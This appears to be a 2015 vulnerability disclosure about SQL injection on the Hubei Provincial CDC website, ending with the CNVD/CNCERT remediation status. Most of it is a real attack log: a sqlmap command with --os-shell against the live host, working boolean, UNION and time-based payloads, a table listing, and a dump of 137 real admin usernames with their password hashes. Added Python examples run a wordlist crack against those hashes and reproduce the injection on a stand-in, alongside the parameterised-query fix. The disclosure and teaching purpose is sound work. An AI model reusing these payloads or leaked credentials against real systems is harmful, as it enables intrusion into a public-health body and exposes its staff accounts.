2015-04-10: Details sent to the vendor; awaiting the vendor's handling
2015-04-14: Vendor confirmed; details disclosed to the vendor only
2015-04-24: Details disclosed to core white hats and domain experts
2015-05-04: Details disclosed to regular white hats
2015-05-14: Details disclosed to intern white hats
2015-05-29: Details disclosed to the public
SQL injection on a site of the Hubei Provincial Center for Disease Control and Prevention; getshell is possible and the privileges are fairly high. Not interested in the intranet.
C:\Users\\Desktop\sqlmap-master>python sqlmap.py -u "http://hbcdc.cn/index.php/common-vote.html?id=1" --os-shell
blindsql: POST [id => and(1=1)] 100% http://hbcdc.cn/index.php/common-vote.html?id=1)
blindsql: GET [cid => and(1=1)] 85% http://hbcdc.cn/index.php/index-enewsContent.html?cid=7)
blindsql: GET [bid => and(1=1)] 11% http://hbcdc.cn/index.php/index-enewsList.html?bid=16&id=15)
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET
back-end DBMS: MySQL 5.0.11

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1) AND 4371=4371 AND (6481=6481

    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: id=-7921) UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766b6a71,0x6f43705165624878556d,0x7178767171),NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1) AND SLEEP(5) AND (2550=2550
---
current user: 'root@localhost'
current database: 'project_jikong'
available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] project_jikong
[*] project_jkdq
[*] test

Database: project_jikong
[96 tables]
+----------------------+
| jk_access            |
| jk_ad                |
| jk_addcontact        |
| jk_adddoctor         |
| jk_adddownload       |
| jk_addhistory        |
| jk_addiframe         |
| jk_addjxjy           |
| jk_addkeshi          |
| jk_addkjqb           |
| jk_addnews           |
| jk_addpage           |
| jk_addpage2          |
| jk_addpage3          |
| jk_addphoto          |
| jk_addprice          |
| jk_addproduct        |
| jk_addtable          |
| jk_addvideo          |
| jk_addzjxx           |
| jk_addzp             |
| jk_addzxdc           |
| jk_admin             |
| jk_adminmodule       |
| jk_admintopnav       |
| jk_archives          |
| jk_archives_feedback |
| jk_arctype           |
| jk_attribute         |
| jk_book              |
| jk_brand             |
| jk_cart              |
| jk_category          |
| jk_channel           |
| jk_checkinfo         |
| jk_collect_cache     |
| jk_collect_goods     |
| jk_collect_node      |
| jk_configtype        |
| jk_enews             |
| jk_enewstype         |
| jk_faq               |
| jk_filehash          |
| jk_flink             |
| jk_flinktype         |
| jk_goldvote          |
| jk_goods             |
| jk_goods_attr        |
| jk_goods_images      |
| jk_goodstype         |
| jk_images            |
| jk_ip_check          |
| jk_kf_form           |
| jk_mallorder         |
| jk_member            |
| jk_member_addr       |
| jk_member_article    |
| jk_member_feedback   |
| jk_member_relatives  |
| jk_msg               |
| jk_myadtype          |
| jk_node              |
| jk_order_action      |
| jk_order_goods       |
| jk_order_info        |
| jk_pay_type          |
| jk_performance       |
| jk_press             |
| jk_product_ext       |
| jk_push_data         |
| jk_pv                |
| jk_region            |
| jk_resume            |
| jk_resume_academic   |
| jk_resume_family     |
| jk_resume_paper      |
| jk_resume_school     |
| jk_resume_science    |
| jk_resume_work       |
| jk_role              |
| jk_role_user         |
| jk_shipping          |
| jk_shipping_type     |
| jk_sites             |
| jk_sms_check         |
| jk_softform          |
| jk_sysconfig         |
| jk_tsjb              |
| jk_user_grant        |
| jk_votea             |
| jk_voteext           |
| jk_votepoll          |
| jk_voteq             |
| jk_votetype          |
| jk_wxld              |
| jk_wxldtype          |
+----------------------+

Database: project_jikong
Table: jk_ad
[13 columns]
+-------------+----------------------+
| Column      | Type                 |
+-------------+----------------------+
| arctype     | smallint(8)          |
| height      | smallint(6)          |
| html        | text                 |
| id          | int(11) unsigned     |
| intro       | varchar(30)          |
| name        | varchar(20)          |
| overdue     | date                 |
| overduehtml | text                 |
| siteid      | smallint(3) unsigned |
| status      | tinyint(1)           |
| type        | varchar(10)          |
| url         | varchar(200)         |
| width       | smallint(6)          |
+-------------+----------------------+

Database: project_jikong
Table: jk_admin
[14 columns]
+---------------+------------------+
| Column        | Type             |
+---------------+------------------+
| administrator | tinyint(1)       |
| email         | char(30)         |
| id            | int(10) unsigned |
| loginip       | varchar(20)      |
| logintime     | int(11) unsigned |
| pwd           | char(32)         |
| role_read     | text             |
| role_write    | text             |
| siteid        | varchar(255)     |
| status        | tinyint(1)       |
| typeid        | text             |
| uname         | char(20)         |
| userid        | char(30)         |
| usertype      | float unsigned   |
+---------------+------------------+

Database: project_jikong
Table: jk_admin
[137 entries]
+------------+---------+----------------------------------+---------+---------------+
| userid     | uname   | pwd                              | email   | administrator |
+------------+---------+----------------------------------+---------+---------------+
| admin      | 京伦    | 3dfbe89e06ab378feba321b01f4d3e2d | <blank> | 1             |
| lyf_admin  | 管理员  | 3cf108a4e0a498347a5a75a792f23212 | <blank> | 1             |
| test       | <blank> | e388f02f750e65ebba95ab9493cda01e | <blank> | 0             |
| 卫生监测所 | <blank> | d11cfc843cf8cc0287dcb019d19c2310 | <blank> | 0             |
| 舆论监测   | <blank> | e388f02f750e65ebba95ab9493cda01e | <blank> | 0             |
| 院办       | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 党办       | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 财务处     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 人教处     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 监察室     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 工会       | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 质管室     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 生物办     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 传防所     | <blank> | da976758089bb2ab48893a05f6f5c8df | <blank> | 0             |
| 血研所     | <blank> | ec40cc7df116c5a91c5029856c76ca73 | <blank> | 0             |
| 安评中心   | <blank> | 642c56654ffd4057919a366592badb5a | <blank> | 0             |
| 慢病所     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 健教所     | <blank> | 493e1278d7bcccdd84906cbbed37acf7 | <blank> | 0             |
| 总务后勤处 | <blank> | 6800e8641393e7976f9de5d73c3c6aae | <blank> | 0             |
| 武汉市     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 江岸区     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 江汉区     | <blank> | f495ed23a05c4c0ee20607b9b5d9f545 | <blank> | 0             |
| 硚口区     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 汉阳区     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 武昌区     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 青山区     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 洪山区     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 东西湖区   | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 汉南区     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 蔡甸区     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 江夏区     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 黄陂区     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 新洲区     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 黄石市     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 黄石港区   | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 下陆区     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 铁山区     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 阳新县     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 大冶市     | <blank> | e388f02f750e65ebba95ab9493cda01e | <blank> | 0             |
| 十堰市     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 茅箭区     | <blank> | 7a242f57739dadc6eb3f748e2e8852f5 | <blank> | 0             |
| 张湾区     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 郧县       | <blank> | e388f02f750e65ebba95ab9493cda01e | <blank> | 0             |
| 郧西县     | <blank> | e388f02f750e65ebba95ab9493cda01e | <blank> | 0             |
| 竹山县     | <blank> | dd37ae4f3497d35fb99f460e42caa1b7 | <blank> | 0             |
| 竹溪县     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 房县       | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 丹江口市   | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 宜昌市     | <blank> | 5035006ca5d6209cc8580064473d7642 | <blank> | 0             |
| 西陵区     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 伍家岗区   | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 点军区     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 猇亭区     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 夷陵区     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 远安县     | <blank> | b07d6731b744a952f925c71601125634 | <blank> | 0             |
| 兴山县     | <blank> | e388f02f750e65ebba95ab9493cda01e | <blank> | 0             |
| 秭归县     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 长阳县     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 五峰县     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 宜都市     | <blank> | bcdb7786b940b542d7a57791e53f6cab | <blank> | 0             |
| 当阳市     | <blank> | 967d567d832132850a0ea59b45075d72 | <blank> | 0             |
| 枝江市     | <blank> | bc4d26a91a9eb2a6ea1e2c217762642f | <blank> | 0             |
| 襄阳市     | <blank> | 38ee6a9bbc2c6d0860dd73384bd0c327 | <blank> | 0             |
| 襄城区     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 樊城区     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 襄州区     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 南漳县     | <blank> | d34a3cfc05e367c4bc52e6d562bb60ca | <blank> | 0             |
| 谷城县     | <blank> | e388f02f750e65ebba95ab9493cda01e | <blank> | 0             |
| 保康县     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 老河口市   | <blank> | 7750028eaf606d7a74f37c0b71b6c666 | <blank> | 0             |
| 枣阳市     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 宜城市     | <blank> | aeb08f8ed7bfb3f05878eedb51148a68 | <blank> | 0             |
| 鄂州市     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 梁子湖区   | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 华容区     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 鄂城区     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 荆门市     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 东宝区     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 掇刀区     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 京山县     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 沙洋县     | <blank> | 709624e7e0c56e5aaf13de41136bb65c | <blank> | 0             |
| 钟祥市     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 孝感市     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 孝南区     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 孝昌县     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 大悟县     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 云梦县     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 应城市     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 安陆市     | <blank> | 80f1af79cd5bf0a354d2e9cb672e5b68 | <blank> | 0             |
| 汉川市     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 荆州市     | <blank> | d950d397fa2057a1b01ad2d96cbe0a62 | <blank> | 0             |
| 沙市区     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 荆州区     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 公安县     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 监利县     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 江陵县     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 石首市     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 洪湖市     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 松滋市     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 黄冈市     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 黄州区     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 团风县     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 红安县     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 罗田县     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 英山县     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 浠水县     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 蕲春县     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 黄梅县     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 麻城市     | <blank> | e388f02f750e65ebba95ab9493cda01e | <blank> | 0             |
| 武穴市     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 咸宁市     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 咸安区     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 嘉鱼县     | <blank> | e388f02f750e65ebba95ab9493cda01e | <blank> | 0             |
| 通城县     | <blank> | da70c317d67c464fa004aa382da55d52 | <blank> | 0             |
| 崇阳县     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 通山县     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 赤壁市     | <blank> | d03c2f0f9063a67c18ff050acf886b08 | <blank> | 0             |
| 随州市     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 曾都区     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 广水市     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 随县       | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 恩施州     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 恩施市     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 利川市     | <blank> | 8b4289c4a99ce3c9c3bfac1a94dbd591 | <blank> | 0             |
| 巴东县     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 宣恩县     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 咸丰县     | <blank> | fbceaea07f735c33d49c5b668039965c | <blank> | 0             |
| 来凤县     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 鹤峰县     | <blank> | af7a2c8ee4b1ec3f03f8bb2c5e66da1e | <blank> | 0             |
| 仙桃市     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 潜江市     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 天门市     | <blank> | 2b8383efd102011bc78127bf1a29134f | <blank> | 0             |
| 神农架林区 | <blank> | 44e9e6ba412407eb920941f5519a8416 | <blank> | 0             |
| 西塞山区   | <blank> | e388f02f750e65ebba95ab9493cda01e | <blank> | 0             |
| 信息所     | <blank> | 6ef096b1c33aeb0c0b595f5cb2296ba0 | <blank> | 0             |
| 建始县     | <blank> | e388f02f750e65ebba95ab9493cda01e | <blank> | 0             |
| 测试       | <blank> | e388f02f750e65ebba95ab9493cda01e | <blank> | 0             |
+------------+---------+----------------------------------+---------+---------------+
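An added example, not code from the report or from the site: the pwd column above is char(32) and every dumped value is 32 lowercase hex characters, which is consistent with an unsalted MD5 of the password (an assumption; the application code is not on the page). Under such a scheme equal passwords give equal digests, and the dump bears that out: one digest (2b8383efd102011bc78127bf1a29134f) appears on 95 of the 137 rows, and a second (e388f02f750e65ebba95ab9493cda01e) is shared by a dozen rows including the test accounts. The Python below groups a subset of the dumped rows by digest, shows why one guessed password then opens every account in a group, and contrasts that storage with per-user salted PBKDF2. The wordlist and the shared password used for the contrast are constructed; no claim is made about what the real digests decode to.

```python
import hashlib
import os
from collections import defaultdict

# Added illustration. Rows are copied from the jk_admin dump above as
# (userid, pwd); the full dump has 137 rows, this subset shows the two
# repeated digests.
DUMPED_ROWS = [
    ("admin", "3dfbe89e06ab378feba321b01f4d3e2d"),
    ("lyf_admin", "3cf108a4e0a498347a5a75a792f23212"),
    ("test", "e388f02f750e65ebba95ab9493cda01e"),
    ("舆论监测", "e388f02f750e65ebba95ab9493cda01e"),
    ("院办", "2b8383efd102011bc78127bf1a29134f"),
    ("党办", "2b8383efd102011bc78127bf1a29134f"),
    ("财务处", "2b8383efd102011bc78127bf1a29134f"),
    ("武汉市", "2b8383efd102011bc78127bf1a29134f"),
]

HEX = set("0123456789abcdef")


def looks_like_unsalted_md5(digest: str) -> bool:
    # 32 lowercase hex chars in a char(32) column: consistent with a raw MD5
    # of the password. This is an assumption; the page shows no PHP code.
    return len(digest) == 32 and set(digest) <= HEX


def shared_hash_groups(rows) -> dict:
    # With an unsalted hash, equal digests mean equal passwords, so one
    # guessed password unlocks every account in the group.
    by_hash = defaultdict(list)
    for user, digest in rows:
        by_hash[digest].append(user)
    return {d: users for d, users in by_hash.items() if len(users) > 1}


def md5_unsalted(password: str) -> str:
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def crack_with_wordlist(groups: dict, wordlist) -> dict:
    # Offline guessing against unsalted MD5: one hash per word is compared
    # against every account at once. Returns {digest: password} for hits.
    lookup = {md5_unsalted(w): w for w in wordlist}
    return {d: lookup[d] for d in groups if d in lookup}


def pbkdf2_salted(password: str, salt: bytes, iterations: int = 200_000) -> str:
    # Per-user salt plus a slow KDF: equal passwords no longer produce equal
    # stored values, and every guess has to be recomputed per user.
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations).hex()


def compare_storage(password: str = "Spring2015", users: int = 3) -> tuple:
    # Constructed password shared by `users` accounts; returns the number of
    # distinct stored values under unsalted MD5 versus salted PBKDF2.
    unsalted = {md5_unsalted(password) for _ in range(users)}
    salted = {pbkdf2_salted(password, os.urandom(16)) for _ in range(users)}
    return len(unsalted), len(salted)


if __name__ == "__main__":
    for digest, users in shared_hash_groups(DUMPED_ROWS).items():
        print(digest, "shared by", users)
    # Constructed wordlist; only reports a digest when its preimage is known.
    print(crack_with_wordlist(shared_hash_groups(DUMPED_ROWS), ["123456", "password"]))
    print(compare_storage())  # (1, 3)
```

The grouping alone is what a reviewer of such a dump should do first: a shared digest across 95 department and county accounts means a provisioning default that was never changed, and with no salt a single successful guess is a login to all of them. Salting does not stop guessing for one account, but it removes the one-guess-many-accounts amplification and, with a slow KDF, raises the cost per guess.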
No desire to escalate privileges on the intranet anymore.
Filter the input.
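An added example, not part of the report or of the site's code: the three injection types sqlmap listed above, reproduced against a constructed stand-in in Python, next to the parameter-bound query that closes the hole. The site runs PHP on MySQL; SQLite is used here only so the example runs offline. sqlmap's MySQL-specific CONCAT(0x..) marker strings and trailing '#' comment are rewritten in SQLite syntax (the hex markers decode to 'qvkjq' and 'qxvqq'), and the SLEEP(5) time-based probe is left out because SQLite has no sleep function. The table jk_votetype appears in the dump above, but its columns are not on the page, so the five columns used here are assumed.

```python
import sqlite3

# Added illustration: minimal stand-in for the vulnerable page. Table layout
# is constructed (jk_votetype exists in the dump, its columns do not).
SCHEMA = """
CREATE TABLE jk_votetype (id INTEGER, name TEXT, intro TEXT, status INTEGER, siteid INTEGER);
INSERT INTO jk_votetype VALUES (1, 'vote-1', 'first poll', 1, 1);
INSERT INTO jk_votetype VALUES (7, 'vote-7', 'seventh poll', 0, 1);
CREATE TABLE jk_admin (userid TEXT, pwd TEXT);
-- the admin row from the jk_admin dump above
INSERT INTO jk_admin VALUES ('admin', '3dfbe89e06ab378feba321b01f4d3e2d');
"""


def setup() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, raw_id: str) -> list:
    # The id parameter is pasted into a parenthesised WHERE clause, which is
    # what sqlmap's "1) AND ... AND (..." payload shape indicates.
    sql = ("SELECT id, name, intro, status, siteid FROM jk_votetype "
           f"WHERE (id={raw_id})")
    return conn.execute(sql).fetchall()


def safe_lookup(conn, raw_id: str) -> list:
    # Same query with a bound parameter: the value is data, never SQL.
    sql = ("SELECT id, name, intro, status, siteid FROM jk_votetype "
           "WHERE (id=?)")
    return conn.execute(sql, (raw_id,)).fetchall()


# sqlmap's boolean-based probe from the report, verbatim, plus its false
# twin: a true condition returns the normal row, a false one returns nothing.
TRUE_PROBE = "1) AND 4371=4371 AND (6481=6481"
FALSE_PROBE = "1) AND 4371=4372 AND (6481=6481"


def union_extract(conn) -> list:
    # sqlmap's 5-column UNION payload in SQLite syntax. Column 4 carries one
    # jk_admin row per result row, wrapped in the same marker strings sqlmap
    # uses to find its data in the page.
    probe = ("-7921) UNION ALL SELECT NULL,NULL,NULL,"
             "'qvkjq'||userid||':'||pwd||'qxvqq',NULL FROM jk_admin --")
    out = []
    for row in vulnerable_lookup(conn, probe):
        cell = row[3] or ""
        if cell.startswith("qvkjq") and cell.endswith("qxvqq"):
            out.append(cell[len("qvkjq"):-len("qxvqq")])
    return out


def blind_extract_pwd(conn, length: int = 32) -> str:
    # Boolean-based blind extraction: one true/false query per candidate
    # character, which is how data comes out when UNION is not available.
    recovered = ""
    for pos in range(1, length + 1):
        for ch in "0123456789abcdef":
            probe = (f"1) AND substr((SELECT pwd FROM jk_admin LIMIT 1),{pos},1)"
                     f"='{ch}' AND (1=1")
            if vulnerable_lookup(conn, probe):
                recovered += ch
                break
    return recovered


if __name__ == "__main__":
    conn = setup()
    print(vulnerable_lookup(conn, TRUE_PROBE))   # one row
    print(vulnerable_lookup(conn, FALSE_PROBE))  # []
    print(safe_lookup(conn, TRUE_PROBE))         # []: the probe is just a string
    print(union_extract(conn))
    print(blind_extract_pwd(conn))
```

The bound version returns nothing for either probe because the whole string is compared against id as a value; no filter list is involved, which is why parameter binding rather than input filtering is the fix to ask the vendor for. The "0 HTTP(s) requests" in the sqlmap output above is what sqlmap prints when it resumes injection points from a saved session; a fresh blind extraction of a 32-character hash at one request per candidate character, as in the loop here, is up to 512 requests (sqlmap bisects and needs fewer), and that request volume is the most visible trace such a run leaves in the web server logs.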
Severity: High
Vulnerability Rank: 13
Confirmed at: 2015-04-14 18:11
CNVD has confirmed and reproduced the situation described; the case has been passed to CNCERT, which has forwarded it to its Hubei branch center to coordinate remediation with the unit that manages the website.
None yet.